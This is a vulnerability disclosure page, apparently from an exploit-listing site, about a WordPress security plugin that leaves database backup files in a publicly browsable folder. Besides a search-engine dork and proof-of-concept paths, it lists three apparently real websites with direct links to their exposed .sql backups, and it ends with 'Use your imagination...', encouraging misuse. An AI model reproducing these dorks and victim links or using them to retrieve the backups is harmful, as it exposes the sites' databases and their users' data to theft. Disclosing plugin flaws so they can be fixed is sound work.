WordPress 'WP Security Scan(Acunetix)' Exposure Backup File Unauthorized Control

2015.05.18

Credit: Hugo Santiago dos Santos

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: \"Index of\" +/wp-content/plugins/wp-security-scan/

# WordPress 'WP Security Scan(Acunetix)' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage¹: https://wordpress.org/plugins/wp-security-scan/
# Vendor Homepage²: https://www.acunetix.com/websitesecurity/wordpress-security-plugin/
# Google Dork: "Index of" +/wp-content/plugins/wp-security-scan/

# PoC :

http://SITE.COM/wp-security-scan/backups/  OR
http://SITE.COM/wp-security-scan/backups/res/

# Examples:

http://www.ufscnet.org/wp-content/plugins/wp-security-scan/res/backups/
http://www.ufscnet.org/wp-content/plugins/wp-security-scan/res/backups/bck_11-28-2014-10-11-53_1427163500.7.sql

http://grupolazben.com/wp-content/plugins/wp-security-scan/backups/
http://grupolazben.com/wp-content/plugins/wp-security-scan/backups/bck-07-17-2012-95fceda9703fd498b2ad95bba679ef95.sql

http://www.newworldsandbeyond.info/wp-content/plugins/wp-security-scan/backups/
http://www.newworldsandbeyond.info/wp-content/plugins/wp-security-scan/backups/bck-08-07-2011-da6906c2e5a284ebe11e8adcd05c4719.sql

Use your imagination...

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress 'WP Security Scan(Acunetix)' Exposure Backup File Unauthorized Control

Dork: \"Index of\" +/wp-content/plugins/wp-security-scan/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.